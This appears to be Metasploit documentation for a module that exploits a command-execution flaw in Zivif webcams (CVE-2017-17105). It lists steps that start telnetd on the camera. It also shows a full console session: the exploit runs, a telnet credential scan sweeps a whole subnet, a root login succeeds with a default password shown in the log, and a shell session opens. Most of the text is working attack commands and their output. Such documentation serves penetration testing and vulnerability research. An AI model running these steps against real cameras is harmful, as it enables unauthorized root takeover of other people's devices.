Description
This module exploits a remote command execution vulnerability in Zivif webcams. This is known to impact versions prior to and including v2.3.4.2103. Exploit was reported in CVE-2017-17105.
This module has been tested successfully on version v2.3.4.2103 and V4.7.4.2121.
Vulnerable Application
Unfortunately a virtual copy of this camera is not available.
Verification Steps
Start msfconsole
Do: use exploit/unix/http/zivif_ipcheck_exec
Do: set rhost [IP]
Do: set PAYLOAD payload/cmd/unix/generic
Do: set CMD telnetd
Do: exploit
Port 23 will now be open on the target
Scenarios
msf5 > use exploit/unix/http/zivif_ipcheck_exec
msf5 exploit(unix/http/zivif_ipcheck_exec) > set rhost 192.168.0.35
rhost => 192.168.0.35
msf5 exploit(unix/http/zivif_ipcheck_exec) > set PAYLOAD payload/cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf5 exploit(unix/http/zivif_ipcheck_exec) > set CMD telenetd
CMD => telenetd
msf5 exploit(unix/http/zivif_ipcheck_exec) > exploit
[*] Sending request
[+] Command sent successfully
[*] Exploit completed, but no session was created.
msf5 exploit(unix/http/zivif_ipcheck_exec) >
msf5 exploit(unix/http/zivif_ipcheck_exec) > back
msf5 > use auxiliary/scanner/telnet/telnet_login
msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf5 auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /root/creds
USERPASS_FILE => /root/creds
msf5 auxiliary(scanner/telnet/telnet_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/telnet/telnet_login) > exploit
[!] 192.168.0.34:23 - No active DB -- Credential data will not be saved!
[+] 192.168.0.34:23 - 192.168.0.34:23 - Login Successful: root:cat1029
[*] 192.168.0.34:23 - Attempting to start session 192.168.0.34:23 with root:cat1029
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.0.34:23) at 2020-06-15 19:47:14 +0000
[-] 192.168.0.34:23 - 192.168.0.34:23 - LOGIN FAILED: admin:cat1029 (Incorrect: )
[*] 192.168.0.34:23 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/telnet/telnet_login) >
msf5 auxiliary(scanner/telnet/telnet_login) > sessions
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell TELNET root:cat1029 (192.168.0.34:23) 0.0.0.0:0 -> 192.168.0.34:23 (192.168.0.34)
msf5 auxiliary(scanner/telnet/telnet_login) >